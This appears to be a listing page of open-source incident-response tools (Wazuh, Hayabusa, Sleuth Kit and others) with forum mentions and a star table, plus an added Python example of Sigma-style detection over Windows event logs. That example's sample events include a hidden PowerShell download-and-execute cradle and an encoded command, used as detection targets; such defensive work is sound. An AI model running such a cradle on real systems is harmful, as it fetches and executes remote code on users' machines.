Top 23 incident-response Open-Source Projects
- kubeshark: The API traffic analyzer for Kubernetes, providing real-time, protocol-level visibility into all traffic and payloads going in, out and across containers, pods, nodes and clusters. Inspired by Wireshark, purpose-built for Kubernetes.
- Wazuh: The open source security platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
- howtheysre: A curated collection of publicly available resources on how technology and tech-savvy organizations around the world practice Site Reliability Engineering (SRE).
- my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
- sleuthkit: The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that let you investigate volume and file system data. The library can be incorporated into larger digital forensics tools, and the command line tools can be used directly to find evidence.
- hayabusa: Hayabusa (隼) is a Sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
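To make the Hayabusa entry concrete, here is an added illustration of the idea it describes, written for this page and not Hayabusa's own code: a small Python matcher that applies a Sigma-shaped rule (selection, filter, condition) to Windows 4688 process-creation records and emits the hits as a time-ordered timeline. The sample events, the rule, the `backup.ps1` filter and the 198.51.100.7 address are all constructed for the example; string comparisons are case-insensitive, as in Sigma, and the condition evaluator covers only `not`/`and`/`or` without parentheses.

```python
"""Sigma-style matching over Windows event records, reduced to its core.

Added illustration written for this page, not Hayabusa's own code. The
events, the rule and the backup.ps1 filter are constructed for the example.
"""
from __future__ import annotations

from datetime import datetime
from typing import Any

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed records shaped like Security 4688 (process creation) events
# exported from EVTX to JSON: System fields flattened, EventData nested.
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"TimeCreated": "2024-04-20T10:15:02Z", "Computer": "WS01", "EventID": 4688,
     "EventData": {"NewProcessName": "C:\\Windows\\System32\\notepad.exe",
                   "CommandLine": "notepad.exe report.txt"}},
    {"TimeCreated": "2024-04-20T10:17:45Z", "Computer": "WS01", "EventID": 4688,
     "EventData": {"NewProcessName": PS, "CommandLine": "powershell -nop -w hidden "
                   "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"}},
    {"TimeCreated": "2024-04-20T09:58:11Z", "Computer": "WS02", "EventID": 4688,
     "EventData": {"NewProcessName": PS, "CommandLine":
                   "powershell.exe IEX (Get-Content C:\\scripts\\backup.ps1 -Raw)"}},
    {"TimeCreated": "2024-04-20T10:20:00Z", "Computer": "WS02", "EventID": 4688,
     "EventData": {"NewProcessName": PS,
                   "CommandLine": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"}},
]

# Constructed rule in Sigma's detection shape. The hypothetical filter drops a
# known internal script that would otherwise trip the IEX selector.
RULE: dict[str, Any] = {
    "title": "Suspicious PowerShell Download Cradle", "level": "high",
    "detection": {
        "selection": {
            "EventID": 4688,
            "NewProcessName|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "IEX", "-enc"],
        },
        "filter": {"CommandLine|contains": "backup.ps1"},
        "condition": "selection and not filter",
    },
}

def _field(event: dict[str, Any], name: str) -> Any:
    """Resolve a field from the flattened System part first, then EventData."""
    return event[name] if name in event else event.get("EventData", {}).get(name)

def _match(actual: Any, expected: Any, modifier: str) -> bool:
    """Sigma string comparisons are case-insensitive; '' means exact match."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    ops = {"": a == e, "contains": e in a,
           "startswith": a.startswith(e), "endswith": a.endswith(e)}
    if modifier not in ops:
        raise ValueError(f"unsupported modifier {modifier!r}")
    return ops[modifier]

def match_selection(event: dict[str, Any], selection: dict[str, Any]) -> bool:
    """Every field in a selection must match; a list value is an OR of alternatives."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        alternatives = expected if isinstance(expected, list) else [expected]
        if not any(_match(_field(event, field), alt, modifier) for alt in alternatives):
            return False
    return True

def evaluate_condition(condition: str, results: dict[str, bool]) -> bool:
    """'not' binds tightest, then 'and', then 'or'. No parentheses or 'N of'."""
    def term(tok: str) -> bool:
        negate = tok.startswith("not ")
        name = tok[4:] if negate else tok
        if name not in results:
            raise KeyError(f"condition references unknown search {name!r}")
        return results[name] != negate
    normalised = " ".join(condition.split())
    return any(all(term(t) for t in clause.split(" and "))
               for clause in normalised.split(" or "))

def build_timeline(events: list[dict[str, Any]], rule: dict[str, Any]) -> list[dict[str, Any]]:
    """Run one rule over every event and return the hits ordered by time."""
    detection = rule["detection"]
    searches = {k: v for k, v in detection.items() if k != "condition"}
    hits = []
    for event in events:
        results = {name: match_selection(event, sel) for name, sel in searches.items()}
        if evaluate_condition(detection["condition"], results):
            hits.append({"time": event["TimeCreated"], "computer": event["Computer"],
                         "rule": rule["title"], "level": rule["level"],
                         "details": _field(event, "CommandLine")})
    hits.sort(key=lambda h: datetime.fromisoformat(h["time"].replace("Z", "+00:00")))
    return hits

if __name__ == "__main__":
    for hit in build_timeline(SAMPLE_EVENTS, RULE):
        print(f"{hit['time']}  {hit['computer']}  {hit['level']:<5} {hit['rule']}: {hit['details']}")
```

Run as a script it prints two timeline rows (the WS01 download cradle at 10:17:45 and the WS02 encoded command at 10:20:00); the WS02 `backup.ps1` invocation matches the selection but is removed by the filter, and notepad never matches. Sorting happens after matching so events from different hosts interleave by time, which is the property that makes a cross-host timeline useful in triage.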
- PersistenceSniper: PowerShell module that Blue Teams, incident responders and system administrators can use to hunt persistence mechanisms implanted on Windows machines. Official Twitter/X account @PersistSniper. Made with ❤️ by @last0x00 and @dottor_morte.
- Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
- Incident-Playbook: GOAL: Incident Response Playbooks Mapped to MITRE ATT&CK Tactics and Techniques. [Contributors Friendly]
- beagle: Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)
- asn: ASN / RPKI validity / BGP stats / IPv4v6 / Prefix / URL / ASPath / Organization / IP reputation / IP geolocation / IP fingerprinting / Network recon / lookup API server / Web traceroute server
Project mentions
Project mention: 24 GitHub repos with 372M views that you can't miss out as a software engineer | dev.to | 2024-01-25
A curated list of Site Reliability and Production Engineering resources: https://github.com/dastergon/awesome-sre
Project mention: Show HN: Alaz: Open-Source, Self-Hosted, eBPF-Based K8s Monitoring | news.ycombinator.com | 2023-09-06
The one similar product I had come across is Kubeshark (https://github.com/kubeshark/kubeshark). But admittedly the eBPF way seems more performant theoretically (given you can afford to have a modern-enough kernel). I'm really excited to see how this project develops out.
The eBPF mode of innovation is pretty exciting, truly a fresh lens to building software. I'm also following Akita Software, the company building an eBPF paradigm of monitoring.
There is currently no feature for excluding specific SCA rules; however, this feature has been requested here and would be added to the roadmap for future releases.
Project mention: 5 GitHub Projects to Help You Become a Better DevOps Engineer ⚡ | dev.to | 2023-06-23
1. How they SRE
Project mention: Show HN: OneUptime – open-source Datadog Alternative | news.ycombinator.com | 2024-04-02
Project mention: What are your go-to tools for task management and/or case work? | /r/cybersecurity | 2023-12-09
I had a quick test with the hive; looks pretty nice. https://thehive-project.org/
Project mention: How to carry out mass Digital Forensic Collections using open source tools? | /r/computerforensics | 2023-12-06
Project mention: Are there any GPU-powered disk forensics libraries/frameworks or programs? | /r/CUDA | 2023-09-28
Project mention: Hayabusa: Sigma-based forensics timeline generator for Windows event logs | news.ycombinator.com | 2024-04-24
Here are lots of templates from GitHub to use for your post-mortem meeting.
incident-response related posts
- Vector: A high-performance observability data pipeline
- Show HN: OneUptime – Self Hosted Open Source Datadog Alternative
- It's not always DNS – unless it is
- Show HN: OneUptime – open-source Incident.io,StatusPage.io,PagerDuty alternative
- OneUptime: Open Source StatusPage.io + UptimeRobot + PagerDuty alternative that you can self-host on Kubernetes and Helm
- PagerDuty Postmortem Handbook
- How to carry out mass Digital Forensic Collections using open source tools?
Index
What are some of the best open-source incident-response projects? This list will help you:
# | Project | Stars
---|---|---
1 | awesome-sre | 11,484
2 | kubeshark | 10,541
3 | Wazuh | 9,108
4 | howtheysre | 8,918
5 | my-arsenal-of-aws-security-tools | 8,692
6 | awesome-incident-response | 7,114
7 | oneuptime | 4,052
8 | awesome-threat-detection | 3,325
9 | TheHive | 3,166
10 | IntelOwl | 3,103
11 | velociraptor | 2,654
12 | sleuthkit | 2,469
13 | volatility3 | 2,207
14 | hayabusa | 1,922
15 | cyberchef-recipes | 1,881
16 | PersistenceSniper | 1,799
17 | Bashfuscator | 1,502
18 | response | 1,494
19 | Incident-Playbook | 1,329
20 | beagle | 1,250
21 | Cortex | 1,249
22 | postmortem-templates | 1,225
23 | asn | 1,173